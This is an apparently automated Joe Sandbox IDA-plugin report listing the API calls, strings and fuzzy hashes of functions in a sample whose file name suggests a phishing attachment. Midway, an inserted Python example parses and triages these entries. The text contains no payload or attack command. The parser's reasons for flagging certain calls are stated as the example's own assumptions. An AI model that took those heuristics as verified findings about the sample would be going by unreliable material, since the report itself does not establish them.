                                            • Part of subcall function 00E18D68: __getptd_noexit.LIBCMT ref: 00E18D68
                                          • __gmtime64_s.LIBCMT ref: 00E17114
                                          • __gmtime64_s.LIBCMT ref: 00E1714A
                                          • __gmtime64_s.LIBCMT ref: 00E17167
                                          • __allrem.LIBCMT ref: 00E171BD
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E171D9
                                          • __allrem.LIBCMT ref: 00E171F0
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E1720E
                                          • __allrem.LIBCMT ref: 00E17225
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E17243
                                          • __invoke_watson.LIBCMT ref: 00E172B4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                          • String ID:
                                          • API String ID: 384356119-0
                                          • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                          • Instruction ID: b80e1c5f409750615037fdb78c15914a46d58a7c1b705b7b93d9ce97bf1434bf
                                          • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                          • Instruction Fuzzy Hash: 3471E9B1A08716ABD7149E79DC42BDAB3F4AF14B24F14522AF864F72C1E770D9808B90
                                          APIs
                                          • _memset.LIBCMT ref: 00E52A31
                                          • GetMenuItemInfoW.USER32(00EB6890,000000FF,00000000,00000030), ref: 00E52A92
                                          • SetMenuItemInfoW.USER32(00EB6890,00000004,00000000,00000030), ref: 00E52AC8
                                          • Sleep.KERNEL32(000001F4), ref: 00E52ADA
                                          • GetMenuItemCount.USER32(?), ref: 00E52B1E
                                          • GetMenuItemID.USER32(?,00000000), ref: 00E52B3A
                                          • GetMenuItemID.USER32(?,-00000001), ref: 00E52B64
                                          • GetMenuItemID.USER32(?,?), ref: 00E52BA9
                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E52BEF
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E52C03
                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E52C24
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                          • String ID:
                                          • API String ID: 4176008265-0
                                          • Opcode ID: 4c6ccbb154e4e07e6484eea14596289bfa17ba8bc13297447eed23fc29e6f7da
                                          • Instruction ID: bd7afaeb03fb1ff65d5654edcfc735d256744e2b572e52f11924e83dfe666c15
                                          • Opcode Fuzzy Hash: 4c6ccbb154e4e07e6484eea14596289bfa17ba8bc13297447eed23fc29e6f7da
                                          • Instruction Fuzzy Hash: 7F619270900249AFDB21CF64D888DBEBBB8EB42309F14595DEE41B7252D731AD4DDB20
                                          APIs
                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00E77214
                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00E77217
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E7723B
                                          • _memset.LIBCMT ref: 00E7724C
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E7725E
                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00E772D6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend$LongWindow_memset
                                          • String ID:
                                          • API String ID: 830647256-0
                                          • Opcode ID: 3f0a0bbcc9e7e3e09fe278114f5f20bbd86d2711cd32cdc96bd7b51589ea84f0
                                          • Instruction ID: 82b4337fab6d3dbcaca8e3d80f907fd036465112683eaddcd41872b2a48411ed
                                          • Opcode Fuzzy Hash: 3f0a0bbcc9e7e3e09fe278114f5f20bbd86d2711cd32cdc96bd7b51589ea84f0
                                          • Instruction Fuzzy Hash: 17616C75A00208AFDB10DFA4CC81EEE77F8EB09714F14416AFA58B72A1D774AD45DBA0
                                          APIs
                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00E47135
                                          • SafeArrayAllocData.OLEAUT32(?), ref: 00E4718E
                                          • VariantInit.OLEAUT32(?), ref: 00E471A0
                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00E471C0
                                          • VariantCopy.OLEAUT32(?,?), ref: 00E47213
                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00E47227
                                          • VariantClear.OLEAUT32(?), ref: 00E4723C
                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 00E47249
                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E47252
                                          • VariantClear.OLEAUT32(?), ref: 00E47264
                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E4726F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                          • String ID:
                                          • API String ID: 2706829360-0
                                          • Opcode ID: 38a7b471a37b2251bcfe6868127cd2534a40d0c9770c2928331000ec6829b017
                                          • Instruction ID: c7edeb019a75e4cf8039008a68c9fad59cb5cd5b50a5f8839e9780ef36df05dc
                                          • Opcode Fuzzy Hash: 38a7b471a37b2251bcfe6868127cd2534a40d0c9770c2928331000ec6829b017
                                          • Instruction Fuzzy Hash: D2416E71A04219AFCF14DF65D8489AEBBB8FF08354F008069F955B7261DB70A989CFA0
                                          APIs
                                            • Part of subcall function 00DF9997: __itow.LIBCMT ref: 00DF99C2
                                            • Part of subcall function 00DF9997: __swprintf.LIBCMT ref: 00DF9A0C
                                          • CoInitialize.OLE32 ref: 00E68718
                                          • CoUninitialize.OLE32 ref: 00E68723
                                          • CoCreateInstance.OLE32(?,00000000,00000017,00E82BEC,?), ref: 00E68783
                                          • IIDFromString.OLE32(?,?), ref: 00E687F6
                                          • VariantInit.OLEAUT32(?), ref: 00E68890
                                          • VariantClear.OLEAUT32(?), ref: 00E688F1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                          • API String ID: 834269672-1287834457
                                          • Opcode ID: bc750d91357fedae3acb560f45cc09c1b561a40bf96f798acdfce978784a3be7
                                          • Instruction ID: db26a95205866c6c2703f9d37b881f731e3bcfff6055f268277a287571ac84c0
                                          • Opcode Fuzzy Hash: bc750d91357fedae3acb560f45cc09c1b561a40bf96f798acdfce978784a3be7
                                          • Instruction Fuzzy Hash: 726104306483019FD714DF24DA44B6AB7E4EF48794F50591EF985BB291CB70ED48CBA2
                                          APIs
                                          • WSAStartup.WSOCK32(00000101,?), ref: 00E65AA6
                                          • inet_addr.WSOCK32(?,?,?), ref: 00E65AEB
                                          • gethostbyname.WSOCK32(?), ref: 00E65AF7
                                          • IcmpCreateFile.IPHLPAPI ref: 00E65B05
                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00E65B75
                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00E65B8B
                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00E65C00
                                          • WSACleanup.WSOCK32 ref: 00E65C06
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                          • String ID: Ping
                                          • API String ID: 1028309954-2246546115
                                          • Opcode ID: ac584679373de5289d886dce7d2304efd139ba1144cffe5b0fce2f0be5485e87
                                          • Instruction ID: f58c92358feb2ea4277f7763511bb4ede043903aa5f2d2f7f2d0de9690c6214e
                                          • Opcode Fuzzy Hash: ac584679373de5289d886dce7d2304efd139ba1144cffe5b0fce2f0be5485e87
                                          • Instruction Fuzzy Hash: F651C0326447019FD720DF25EC45B6ABBE0EF48354F049929F659EB2A1DB70E844CF12
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 00E5B73B
                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00E5B7B1
                                          • GetLastError.KERNEL32 ref: 00E5B7BB
                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 00E5B828
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Error$Mode$DiskFreeLastSpace
                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                          • API String ID: 4194297153-14809454
                                          • Opcode ID: 22c9792613459c7255f9568a17e50e2687e7fe116a18fdc375e178beaeed3adf
                                          • Instruction ID: 7b3f7ceff181001aafaa4b28a595266b61c2fb166fb4c5b50082d405c00ee425
                                          • Opcode Fuzzy Hash: 22c9792613459c7255f9568a17e50e2687e7fe116a18fdc375e178beaeed3adf
                                          • Instruction Fuzzy Hash: E431C635A002089FCB04EF64CC89AFEB7B4EF49705F14952AF905FB291DB71994AC761
                                          APIs
                                            • Part of subcall function 00DF7F41: _memmove.LIBCMT ref: 00DF7F82
                                            • Part of subcall function 00E4B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E4B0E7
                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00E494F6
                                          • GetDlgCtrlID.USER32 ref: 00E49501
                                          • GetParent.USER32 ref: 00E4951D
                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E49520
                                          • GetDlgCtrlID.USER32(?), ref: 00E49529
                                          • GetParent.USER32(?), ref: 00E49545
                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E49548
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 1536045017-1403004172
                                          • Opcode ID: 3ac6dd2d12bf700a047f91c408e6479dd802dc370f3959ba95973d68a61cefe0
                                          • Instruction ID: ca691d362007d35067100bf6c8dd8b7d0879260e26fda6557373a0c268fb7c19
                                          • Opcode Fuzzy Hash: 3ac6dd2d12bf700a047f91c408e6479dd802dc370f3959ba95973d68a61cefe0
                                          • Instruction Fuzzy Hash: 6D21D170A00208AFCF04ABA5DC859FEBBB4EF49310F104115F621A72A2DB7599199B70
                                          APIs
                                            • Part of subcall function 00DF7F41: _memmove.LIBCMT ref: 00DF7F82
                                            • Part of subcall function 00E4B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E4B0E7
                                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00E495DF
                                          • GetDlgCtrlID.USER32 ref: 00E495EA
                                          • GetParent.USER32 ref: 00E49606
                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E49609
                                          • GetDlgCtrlID.USER32(?), ref: 00E49612
                                          • GetParent.USER32(?), ref: 00E4962E
                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E49631
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 1536045017-1403004172
                                          • Opcode ID: e00c68fe657f705b19e412d4a44e9d8edea160d4c5070ad4616f507d4b70186f
                                          • Instruction ID: 159dc9cd943ebf10bb755e171c13b5ae2475a5458ec8c12ec322e516c9bf5198
                                          • Opcode Fuzzy Hash: e00c68fe657f705b19e412d4a44e9d8edea160d4c5070ad4616f507d4b70186f
                                          • Instruction Fuzzy Hash: 0421C170A00208BFDF04ABA5DC85EFEBBB8EF48300F114055FA11B71A6DB7599599B70
                                          APIs
                                          • GetParent.USER32 ref: 00E49651
                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00E49666
                                          • _wcscmp.LIBCMT ref: 00E49678
                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E496F3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameParentSend_wcscmp
                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                          • API String ID: 1704125052-3381328864
                                          • Opcode ID: 94fb02eb804fb3f20e2886ba077f81c91b47d544eedd209920e03a229334de66
                                          • Instruction ID: ebfdf34b92492e29ae8519266e470127e47b5399ecd3f72b1a19c909ce0d9bd5
                                          • Opcode Fuzzy Hash: 94fb02eb804fb3f20e2886ba077f81c91b47d544eedd209920e03a229334de66
                                          • Instruction Fuzzy Hash: 1E112976648307BAFA052631FC0BDE7B7DC9B06774F212066F900B90D3FEA169914A98
                                          APIs
                                          • __swprintf.LIBCMT ref: 00E5419D
                                          • __swprintf.LIBCMT ref: 00E541AA
                                            • Part of subcall function 00E138D8: __woutput_l.LIBCMT ref: 00E13931
                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 00E541D4
                                          • LoadResource.KERNEL32(?,00000000), ref: 00E541E0
                                          • LockResource.KERNEL32(00000000), ref: 00E541ED
                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 00E5420D
                                          • LoadResource.KERNEL32(?,00000000), ref: 00E5421F
                                          • SizeofResource.KERNEL32(?,00000000), ref: 00E5422E
                                          • LockResource.KERNEL32(?), ref: 00E5423A
                                          • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00E5429B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                          • String ID:
                                          • API String ID: 1433390588-0
                                          • Opcode ID: ac88d31104e912d228e04ec2a703f2c03c1565c0704e95b40a8a679e6907755a
                                          • Instruction ID: 4bfddd67a96d0b11564dd53bf42b9fb413db0a254121e626bbfc0aed5200be77
                                          • Opcode Fuzzy Hash: ac88d31104e912d228e04ec2a703f2c03c1565c0704e95b40a8a679e6907755a
                                          • Instruction Fuzzy Hash: 293191B550521AAFCB11DF61DD44EBB7BA8EF04306F004925FD05F21A1DB30DA95CBA0
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00E51700
                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00E50778,?,00000001), ref: 00E51714
                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00E5171B
                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E50778,?,00000001), ref: 00E5172A
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E5173C
                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E50778,?,00000001), ref: 00E51755
                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E50778,?,00000001), ref: 00E51767
                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00E50778,?,00000001), ref: 00E517AC
                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00E50778,?,00000001), ref: 00E517C1
                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00E50778,?,00000001), ref: 00E517CC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                          • String ID:
                                          • API String ID: 2156557900-0
                                          • Opcode ID: 17190d6758bb53c248909d7df2e77f9ceedf147956a63cfd24f7dd31ab59c932
                                          • Instruction ID: 81d2c909c1e53bac92e8c693dffdc7f780a373c26ae51211e49b5930a8a9b7f2
                                          • Opcode Fuzzy Hash: 17190d6758bb53c248909d7df2e77f9ceedf147956a63cfd24f7dd31ab59c932
                                          • Instruction Fuzzy Hash: 5D31D171604204BFDB11DF5ADC84F7A37E9EB4A71AF104496FD04F62A0D7749D888B54
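The entries on this page are flattened per-function records from the Joe Sandbox IDA plugin: the API calls a function makes (with the stack arguments the sandbox could recover, "?" where it could not), the API ID / String ID keys used for similarity matching, and the opcode and instruction fuzzy hashes. Reading hundreds of them by hand is slow, so the following Python is an added example, not Joe Sandbox code and not part of this report, that parses this exact text layout into records, names the window message in SendMessageW calls where the recovered msg slot is clean, and flags the calls a triager would look at first. The message-name table holds winuser.h values for the messages that appear above; the INTERESTING table and the reasons attached to it are assumptions made for this example, and SAMPLE is two of the entries above (the LB_SELECTSTRING one and the AttachThreadInput one) with their memory-dump lines trimmed.

```python
"""Parse Joe Sandbox per-function 'APIs' / 'Similarity' entries and triage them (added example)."""
import re
from dataclasses import dataclass, field
from typing import Optional

# One call line under "APIs":  Name.MODULE(args), ref: ADDR   |   Name.MODULE ref: ADDR
# optionally prefixed with "Part of subcall function ADDR: ".
API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<subfn>[0-9A-F]{8}): )?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)

# Window messages seen as SendMessageW arguments on this page (winuser.h values).
MESSAGE_NAMES = {0x0031: "WM_GETFONT", 0x0080: "WM_SETICON", 0x0111: "WM_COMMAND",
                 0x0186: "LB_SETCURSEL", 0x018C: "LB_SELECTSTRING"}

# Calls a first triage pass should surface.  The reasons are this example's own
# assumptions about why they matter, not findings stated by the report.
INTERESTING = {
    "AttachThreadInput": "joins the foreground window's input queue (focus forcing)",
    "CreateProcessW": "spawns a child process",
}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall_of: Optional[str] = None  # set for "Part of subcall function" lines

@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)  # "API ID", "String ID", hashes, ...

def parse_entries(text: str) -> list:
    """Split the flattened report text into one FunctionEntry per 'APIs' header."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()  # drop indentation and bullet
        if not line:
            continue
        if line == "APIs":  # every entry starts with this header
            current = FunctionEntry()
            entries.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] is not None else []
            current.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["subfn"]))
        elif ":" in line:  # "Key: value" lines; the value may be empty ("String ID:")
            key, _, value = line.partition(":")
            current.meta[key.strip()] = value.strip()
    return entries

def decode_message(call: ApiCall) -> Optional[str]:
    """Name the msg slot of a SendMessageW call.  The report lists recovered stack
    slots in call order (hwnd, msg, wParam, lParam) and prints '?' for unknown ones."""
    if call.name != "SendMessageW" or len(call.args) < 2:
        return None
    try:
        return MESSAGE_NAMES.get(int(call.args[1], 16))
    except ValueError:  # slot shown as '?'
        return None

def triage(entries: list) -> list:
    """Return (API ID, call name, reason) once per interesting call per entry."""
    hits = []
    for entry in entries:
        for name in dict.fromkeys(c.name for c in entry.calls):  # ordered, de-duplicated
            if name in INTERESTING:
                hits.append((entry.meta.get("API ID", ""), name, INTERESTING[name]))
    return hits

# Two entries copied from this report, trimmed of their memory-dump lines.
SAMPLE = """\
APIs
  • Part of subcall function 00DF7F41: _memmove.LIBCMT ref: 00DF7F82
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00E494F6
• GetDlgCtrlID.USER32 ref: 00E49501
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00E49520
Similarity
• API ID: MessageSend$CtrlParent$ClassName_memmove
• String ID: ComboBox$ListBox
APIs
• GetCurrentThreadId.KERNEL32 ref: 00E51700
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E50778,?,00000001), ref: 00E5172A
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00E50778,?,00000001), ref: 00E517CC
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
"""

if __name__ == "__main__":
    for hit in triage(parse_entries(SAMPLE)):
        print(*hit)
```

To run it over the whole report, pass the page text instead of SAMPLE; the parser consumes only the "APIs" header, the call lines and "Key: value" lines, so entries that still carry their Memory Dump Source and Snapshot File lines parse the same way. Treat a decoded message name as a hint rather than ground truth: the argument columns are recovered from the stack by the sandbox, and where a slot could not be recovered the report prints "?" and the decoder returns None rather than guessing.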
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
